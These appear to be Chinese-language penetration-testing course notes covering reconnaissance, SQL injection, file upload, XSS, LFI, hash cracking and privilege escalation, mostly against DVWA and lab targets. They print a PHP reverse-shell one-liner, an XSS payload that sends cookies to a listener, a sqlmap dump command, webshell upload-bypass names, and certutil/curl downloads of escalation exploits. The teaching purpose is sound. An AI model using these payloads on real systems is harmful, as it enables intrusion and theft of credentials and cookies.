# 滲透測試實務 ## 簡介 ``` 中華民國刑法 第 三十六 章 妨害電腦使用罪 第 358 條 無故輸入他人帳號密碼、破解使用電腦之保護措施或利用電腦系統之漏洞，而入侵他人之電腦或其相關設備者，處三年以下有期徒刑、拘役或科或併科三十萬元以下罰金。 第 359 條 無故取得、刪除或變更他人電腦或其相關設備之電磁紀錄，致生損害於公眾或他人者，處五年以下有期徒刑、拘役或科或併科六十萬元以下罰金。 第 360 條 無故以電腦程式或其他電磁方式干擾他人電腦或其相關設備，致生損害於公眾或他人者，處三年以下有期徒刑、拘役或科或併科三十萬元以下罰金。 第 361 條 對於公務機關之電腦或其相關設備犯前三條之罪者，加重其刑至二分之一。 第 362 條 製作專供犯本章之罪之電腦程式，而供自己或他人犯本章之罪，致生損害於公眾或他人者，處五年以下有期徒刑、拘役或科或併科六十萬元以下罰金。 第 363 條 第三百五十八條至第三百六十條之罪，須告訴乃論。 ``` ### 滲透測試 #### 系統弱點評估 Vulnerability Assessment (VA) 針對目標網站/IP，利用**軟體進行自動化掃描**找出可能的資安弱點 #### 滲透測試 Penetration Testing (PT) 針對少量網站/IP，利用**駭客技術人工方式**深入找出可能的資安弱點 * admin.walter.com.tw * www.walter.com.tw * *.walter.com.tw #### 紅隊測試 Red-Team Testing (RT) 利用**各種駭客可能的攻擊方式**攻擊目標**想保護的標的**，包含社交工程、近域攻擊(ex:wifi) * 常見目標為企業的DC，客戶個資 ## 環境準備 ### 安裝 [VMware (Player)](https://www.vmware.com/tw/products/workstation-player/workstation-player-evaluation.html) ### Download [Kali linux]((https://kali.download/virtual-images/kali-2022.2/kali-linux-2022.2-vmware-amd64.7z)) username:`kali` password:`kali` ~~### Install [Metasploitable2](https://hub.docker.com/r/tleemcjr/metasploitable2)~~ ```= sudo docker pull tleemcjr/metasploitable2 sudo docker run --name mymetasploitable -it tleemcjr/metasploitable2:latest sh -c "/bin/services.sh && bash" root@ab78fd47c2e6:/# ifconfig ``` ### Install [DVWA](https://www.kali.org/tools/dvwa/) ```= sudo apt install dvwa sudo dvwa-start ``` username:`admin` password:`password` ### Download [vulhub]((https://github.com/vulhub/vulhub)) ```= sudo apt install docker.io docker-compose -y cd ~/Downloads/ && git clone https://github.com/vulhub/vulhub.git ``` [docker 教學](https://ithelp.ithome.com.tw/articles/10199339) ### Download vulnhub * [DC1](https://www.vulnhub.com/entry/dc-1,292/) * [WPWN](https://www.vulnhub.com/entry/wpwn-1,537/) ## Intelligence Gathering (情資收集) * Active - 直接接觸目標，例如 Port Scan * Passive - 利用間接的方式收集資訊，不會被目標知道你的IP等資訊，例如利用第三方網站收集資訊 ### Domain Name gathering ##### Online tools * [RapidDNS](https://rapiddns.io/) * [DNSdumpster](https://dnsdumpster.com/) ##### Offline tools * [Amass](https://github.com/OWASP/Amass) ```bash= go install -v github.com/OWASP/Amass/v3/...@master amass enum -passive -d google.com -src ``` #### Subdomain Bruteforce ##### Online tools * https://phpinfo.me/domain/ ##### Offline tools * dnsenum `dnsenum --enum google.com.tw` * gobuster `gobuster dns -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -d google.com.tw` :::success 牛刀小試 - 利用 RapidDNS 搜尋網站並查看網站數量 ::: :::info ~~延伸練習 - 利用 amass 主動搜尋特定網站所有子域名~~ (主動掃描可能被視為攻擊，請確定網路環境允許且被受測網站擁有者授權) ::: :::spoiler 請確定已被授權 `amass enum -v -src -ip -brute -min-for-recursive 2 -d google.com` ::: #### DNS Zone Transfer ##### Example * [多所國內大學 教育單位 DNS 資訊洩漏](https://zeroday.hitcon.org/vulnerability/ZD-2017-00690) * [數聯資安股份有限公司 DNS Zone Transfer](https://zeroday.hitcon.org/vulnerability/ZD-2020-00592) ##### Online tools * [Hacker Target](https://hackertarget.com/zone-transfer/) ##### Offline tools ###### Linux * dnsenum `dnsenum --enum zonetransfer.me` * fierce `fierce --domain zonetransfer.me` * dig ```bash= dig +nostats +nocomments +nocmd NS zonetransfer.me dig axfr zonetransfer.me @nsztm1.digi.ninja ``` ###### Windows * nslookup ```bash= nslookup -type=ns zonetransfer.me nslookup server ns12.zoneedit.com ls -d zonetransfer.me ``` :::success 牛刀小試 - 利用 Hacker Target 檢測特定網站是否存在 DNS Zone Transfer ::: :::info 延伸練習 - 利用其他工具檢測 vulhub DNS Zone Transfer lab ::: ```= ~/Downloads/vulhub/dns/dns-zone-transfer sudo docker-compose up -d nmap --script dns-zone-transfer.nse --script-args "dns-zone-transfer.domain=vulhub.org" -Pn -p 53 127.0.0.1 ``` ### Google Hacking * [亞洲大學資電學院教學網任意檔案下載漏洞](https://zeroday.hitcon.org/vulnerability/ZD-2018-00321) * [成功大學 外國語文學系 Local File Inclusion](https://zeroday.hitcon.org/vulnerability/ZD-2018-01501) #### Online tools * [Google Hacking Database(GHDB)](https://www.exploit-db.com/google-hacking-database) * [Google Hacking tool](http://160.202.163.33) ##### Manual * `site` * `filetype` * `intitle:"index of"` * ... :::success 牛刀小試 - 利用 Google Hacking 找出特定網站是否存在外洩敏感資訊/可再利用資訊 **(注意勿存取敏感資訊)** ::: ### Port Scan #### Example * [國立金門大學 3389 port CVE-2019-0708](https://zeroday.hitcon.org/vulnerability/ZD-2020-00253) #### Tools * nmap ping scan by cidr `nmap 192.168.217.0/24 -sP` * nmap scan all port `nmap -sS <ip/range/cidr> -p-` * nmap parameters ``` -Pn: Treat all hosts as online -- skip host discovery -A: Enable OS detection, version detection, script scanning, and traceroute -p <port ranges>: Only scan specified ports -v: Increase verbosity level --reason: Display the reason a port is in a particular state nmap [Host ip] -A -p- -Pn -oA ReportName -p- : scan all ports (1-65535) -oA: output three format scan reports ``` * list ftp script `cd /usr/share/nmap/scripts && ls ftp* -alh` * Script scan `nmap -sS <ip> -Pn -sC --script=<script name>` :::success 牛刀小試 - 請使用nmap預設掃描 scanme.nmap.org 看開了那些port與banner ::: 建議指令與結果 :::spoiler ```= nmap -v scanme.nmap.org nmap -v scanme.nmap.org -sV -p22,80,2000,5060,9929,31337 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 2000/tcp open tcpwrapped 5060/tcp open tcpwrapped 9929/tcp open nping-echo Nping echo 31337/tcp open tcpwrapped ``` ::: ### Shodan [Shodan](https://www.shodan.io/) shodan filter * `D-LINK` * `country:tw` * `net:140.112.0.0/16` * `port:3389` * `http.title:交通大學` * `http.html:交通大學` * `vuln:CVE-20xx-xxxx` (Small Business+ $359/month) :::success 牛刀小試 - 請使用 shodan 搜尋您熟悉的弱點服務，並且查看台灣 IP 的數量 ::: ### Website Path #### Example * [教育部國文學科中心存在MySQL注入漏洞及跨庫查詢](https://zeroday.hitcon.org/vulnerability/ZD-2017-00673) * [遠東科技大學 諮商輔導中心 IN ARK ，網站參數存在 SQL injection](https://zeroday.hitcon.org/vulnerability/ZD-2022-00092) * [國立彰化師範大學資工系 任意檔案上傳+遠端程式碼執行(RCE)](https://zeroday.hitcon.org/vulnerability/ZD-2022-00433) * [淡江大學無效存取 & 任意檔案上傳](https://zeroday.hitcon.org/vulnerability/ZD-2022-00701) * [演色印刷事業有限公司 網站原始碼洩漏漏洞](https://zeroday.hitcon.org/vulnerability/ZD-2021-00227) #### Path Bruteforce * [gobuster](https://github.com/OJ/gobuster) ```bash gobuster dir -u https://www.walter.com.tw -t 30 -x html,txt,php,asp,aspx,jsp,gif,png,jpg,jpeg -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt ``` * dirb ```bash= dirb http://www.walter.com.tw/ dirb https://www.walter.com.tw/admin/ /usr/share/wordlists/dirb/common.txt -X .php,.html ``` :::success 牛刀小試 - 請使用 dirb 或 gobuster 嘗試列舉 www.walter.com.tw 站台，尋找是否有敏感資訊 ::: 參考指令 :::spoiler ``` dirb https://www.walter.com.tw gobuster dir -u https://www.walter.com.tw -t 30 -x zip -w /usr/share/dirb/wordlists/common.txt ``` ::: ### git leak / backup leak / sensitive file leak #### example * [國立陽明交通大學資電亥客與安全碩士學位學程 系所首頁 .git 原始碼洩漏](https://zeroday.hitcon.org/vulnerability/ZD-2021-00727) * [彰師大資工系官網 git洩漏](https://zeroday.hitcon.org/vulnerability/ZD-2022-00298) * [交通大學 o365註冊網站 git leak AD 帳密洩漏](https://zeroday.hitcon.org/vulnerability/ZD-2020-00927) #### Tools * [GitHack](https://github.com/lijiejie/GitHack) :::success 牛刀小試 - 請使用 GitHack 嘗試攻擊 https://www.walter.com.tw/demo/vul/.git/ 站台 ::: #### Github credential leak ##### Example * [台灣電力公司 行動假單 Weak Passwords](https://zeroday.hitcon.org/vulnerability/ZD-2022-00574) ##### Keyword * github / view-source * apikey * password * pw * pwd * username * token * ... #### Warback Machine * [Wayback Machine](https://archive.org/web/) ### CMS Scan * wpscan `wpscan --url http://walter.com.tw/webservices/wp --api-token=xxxxxxxxxx` 使用 token 可以掃描出更多資訊 [wpscan token](https://wpscan.com/wordpress-security-scanner) :::success 牛刀小試 - 請利用 [10 mins mail](https://10minutemail.net/?lang=zh-tw) 註冊 wpscan 取得 api token ::: ## Exploitation (弱點利用) ### Burp Suite * Install and Configuration * Proxy * Repeater * Intruder * Compare * Burp Collaborator client (Pro version) * [canarytokens](https://canarytokens.org/generate) * [DNSLog](http://dnslog.cn/) (CN 慎用XD) ### Guess Password #### Example * [致用高中修繕系統弱密碼](https://zeroday.hitcon.org/vulnerability/ZD-2022-00458) * [國立屏東科技大學職涯發展處校友服務中心 後台系統存在弱密碼](https://zeroday.hitcon.org/vulnerability/ZD-2022-00462) #### Wordlist ##### dic * https://pastebin.com/jA2d1xGZ * 常見字典 * rockyou.txt `sudo gunzip /usr/share/wordlists/rockyou.txt.gz` * [SecLists](https://github.com/danielmiessler/SecLists/) * 預設密碼 * 廠商密碼 * 聽說廠商都有常用的密碼 :P * 創意發想 * 聽說wifi密碼常常是統編、電話 :::success 牛刀小試 - DVWA Brute Force - low level security 嘗試使用 Burp Suite Intruder找出 admin 的密碼 ::: ##### 撞庫(憑證填充) * [haveibeenpwned](https://haveibeenpwned.com/) * [Socail Engineer Database](https://sgk66.cc/) #### Web * Burp Suite Intruder #### ftp / ssh / web / rdp / ... * [Hydra](https://github.com/vanhauser-thc/thc-hydra) `hydra -L logins.txt -P passwords.txt ftp://localhost/` ### SQL Injection #### Example * [台大電機多處sql injection](https://zeroday.hitcon.org/vulnerability/ZD-2020-00833) * [台灣大學TAIWANIA期刊 網站存在 SQL Injection 漏洞](https://zeroday.hitcon.org/vulnerability/ZD-2021-00353) * [國立空中大學課程查詢網站SQL injection漏洞](https://zeroday.hitcon.org/vulnerability/ZD-2022-00426) #### Concept [DVWA sql injection source code](https://github.com/digininja/DVWA/blob/master/vulnerabilities/sqli/source/low.php#L10) ```sql SELECT first_name, last_name FROM users WHERE user_id = '$id'; ``` - id = `1` ```sql SELECT first_name, last_name FROM users WHERE user_id = '1'; ``` - id = `'` ```sql SELECT first_name, last_name FROM users WHERE user_id = '''; ``` > syntax error - id = `' or 1=1 --` ```sql SELECT first_name, last_name FROM users WHERE user_id = ' or 1=1 --'; ``` #### 快速檢測 Payload * https://example.tw/vul.php?id=3 * https://example.tw/vul.php?id=3-1 * https://example.tw/vul.php?id=3' #### Tools * [sqlmap](https://github.com/sqlmapproject/sqlmap/wiki/Usage) :::success 牛刀小試 - DVWA sql injection - low level security 列出所有使用者 ::: :::info 延伸練習 - DVWA sql injection - low level security 手動或利用 sqlmap 取得使用者的密碼 ::: sqlmap 攻擊參考指令 :::spoiler ``` sqlmap -u "http://127.0.0.1:42001/vulnerabilities/sqli/?id=1&Submit=Submit#" -p id --batch -o --dbms=MYSQL --cookie="PHPSESSID=xxxx; security=low" -D dvwa -T users -C user,password --dump ``` ::: ### File Upload #### Example * [台灣大學任意檔案上傳漏洞](https://zeroday.hitcon.org/vulnerability/ZD-2020-00761) * [東海大學 電子履歷網頁 RCE](https://zeroday.hitcon.org/vulnerability/ZD-2022-00457) #### upload bypass * webshell.pHp * webshell.png.php * webshell.php.png * a.php%00.png * a.php%0d%0a.png * content-type * [file header](https://en.wikipedia.org/wiki/List_of_file_signatures) xxd to view, use burp to change file header #### webshell * /usr/share/webshells/ * https://github.com/tennc/webshell :::success 牛刀小試 - DVWA File Upload - low level ::: :::info 延伸練習 - DVWA File Upload - Medium level ::: 延伸練習提示 :::spoiler 修改副檔名 與 Content-Type: image/jpeg ::: :::warning 深入研究 - DVWA File Upload 轉 reverse shell ::: 深入研究提示 :::spoiler [PayloadsAllTheThings reverse shell](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#php) ``` nc -nvlp 9487 php -r '$sock=fsockopen("127.0.0.1",9487);exec("/bin/sh -i <&3 >&3 2>&3");' ``` ::: ### Cross-Site Scripting (XSS) #### Example * [國立台灣大學 Reflected XSS](https://zeroday.hitcon.org/vulnerability/ZD-2022-00202) * [HITCON ZeroDay svg 檔案 Stored XSS](https://zeroday.hitcon.org/vulnerability/ZD-2018-01230) #### payloads * `<script>alert(1)</script>` * `<script>alert(document.cookie)</script>` * `<img src=x onerror=alert(1)>` * `javascript:alert(1);` * [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Intruders/xss_payloads_quick.txt) * web server get cookie * [XSS hunter](https://xsshunter.com/) :::success 牛刀小試 - DVWA XSS (Reflected) low/medium security level 使其彈跳出含有cookie資訊的警告視窗 ::: :::info 延伸練習 - DVWA XSS low security level 偷取 cookie 資訊 (非彈跳警告視窗) ::: 延伸練習參考指令 :::spoiler 用 web 接取 ``` sudo service apache2 start tail -f /var/log/apache2/access.log <img src=x onerror=this.src='http://127.0.0.1/?'+document.cookie;> ``` 或使用 xss hunter ::: ### Local File Include #### Example * [臺大法律系網站存在任意檔案下載漏洞](https://zeroday.hitcon.org/vulnerability/ZD-2020-00271) * [亞洲大學資電學院教學網任意檔案下載漏洞](https://zeroday.hitcon.org/vulnerability/ZD-2018-00321) #### sensitive file * `/etc/passwd` * `/etc/shadow` * `/var/log/apache2/access.log` * `/proc/self/status` * `C:/Windows/win.ini ` * [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion) :::success 牛刀小試 - DVWA File Inclusion - low security level 嘗試讀取敏感檔案 * /etc/passwd * /home/kali/Documents/flag.txt ::: ### Logic Flaw / Broken Authentication / Broken Access Control #### Example * [衛生福利部擴大紓困申請系統 驗證碼漏洞](https://zeroday.hitcon.org/vulnerability/ZD-2021-00323) * [水里順昌農場 發現邏輯漏洞](https://zeroday.hitcon.org/vulnerability/ZD-2020-00229) * [酒條通 任意帳號接管](https://zeroday.hitcon.org/vulnerability/ZD-2020-00933) * [GIORDANO 訂單資料遍歷](https://zeroday.hitcon.org/vulnerability/ZD-2020-00893) * [多所學校的入口網存在帳號洩露漏洞](https://zeroday.hitcon.org/vulnerability/ZD-2020-00321) * [全家超商 邏輯漏洞](https://zeroday.hitcon.org/vulnerability/ZD-2020-00841) * [8591 寶物交易認證漏洞導致輕鬆修改任意密碼](https://zeroday.hitcon.org/vulnerability/ZD-2016-00068) ### Command Injection #### Example * [台灣照明學會-台灣電力公司 OS Command Injection to RCE](https://zeroday.hitcon.org/vulnerability/ZD-2022-00130) #### Payload * dir / ls * whoami * ping * [hacktricks](https://book.hacktricks.xyz/pentesting-web/command-injection) :::success 牛刀小試 - DVWA Command Inclusion - low security level 新增檔案並且讀取是否成功 ::: ### Hash crack |user|password| |-|-| |admin|5f4dcc3b5aa765d61d8327deb882cf99| |gordonb|e99a18c428cb38d5f260853678922e03| |1337|8d3533d75ae2c3966d7e0d4fcc69216b| |pablo|0d107d09f5bbe40cade3de5c71e9e9b7| |smithy|5f4dcc3b5aa765d61d8327deb882cf99| #### Online tools * [crackstation](https://crackstation.net/) * [cmd5](https://www.cmd5.com/) #### Offline tools * john the ripper `john hash.txt` * hashcat `hashcat -m 500 -a 0 hash.txt rockyou.txt --username` :::success 牛刀小試 - 嘗試使用 john 破解以上hash ::: :::info 延伸練習 - 嘗試破解以下hash (SHA1) `86c16a459ecf39fd76a8e750f9d5074c4722f22b` `39b04978ade0b5bd9065703fc95fe658176046d9` ::: ### Search Exploit * [exploitdb](https://www.exploit-db.com/) * msfconsole > search keyword * searchsploit * search `searchsploit keyword` * review code `searchsploit -x exploit-number` * copy to current path `searchsploit -m exploit-number` * [github](https://github.com/) ### Privelege escalation #### Example * [[Bounty] 電力即點APP Arbitrary File Upload to RCE](https://zeroday.hitcon.org/vulnerability/ZD-2022-00155) #### 提權常見種類 * 作業系統漏洞 * 軟體漏洞 * 設定問題 #### 檔案傳輸 Kali sudo python3 -m http.server 9527 Windows * certutil -urlcache -f http://kali-ip:9527/juicy-potato.exe Linux * curl http://kali-ip/dirtycow -o dirtycow #### Tools * [PEASS-ng](https://github.com/carlospolop/PEASS-ng) * Linux - [linPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) * Windows - [winPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS) #### Cheatsheet * [PayloadsAllTheThings - Linux](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md) * [PayloadsAllTheThings - Windows](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) #### 參考 * [GTFOBins (Linux)](https://gtfobins.github.io/) * [LOLBAS (Windows)](https://lolbas-project.github.io/) ## Pentest Lab ### Vulnhub (vm lab) * [DC1](https://github.com/vshaliii/DC-1-Vulnhub-Walkthrough) * [WPWN](https://resources.infosecinstitute.com/topic/wpwn-1-vulnhub-capture-the-flag-walkthrough/) ## 學習資源 * [Got Your PW](https://gotyour.pw/) * [Burp Web Security Academy](https://portswigger.net/web-security) * [HITCON ZeroDay](https://zeroday.hitcon.org/) * [hackerone](https://hackerone.com/hacktivity) * [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) * [pentestmonkey](https://pentestmonkey.net/category/cheat-sheet) * [ired team](https://www.ired.team/) * [hacktricks](https://book.hacktricks.xyz/welcome/readme) * [ISDA Telegram Channel](https://t.me/ISDA_Channel) * [ISDA 資安討論區 (Line Openchat)](https://line.me/ti/g2/1NvrKT5EXJ_mRCT-sHwIH-iFKAYJOE4SVy1S-g?utm_source=invitation&utm_medium=link_copy&utm_campaign=default)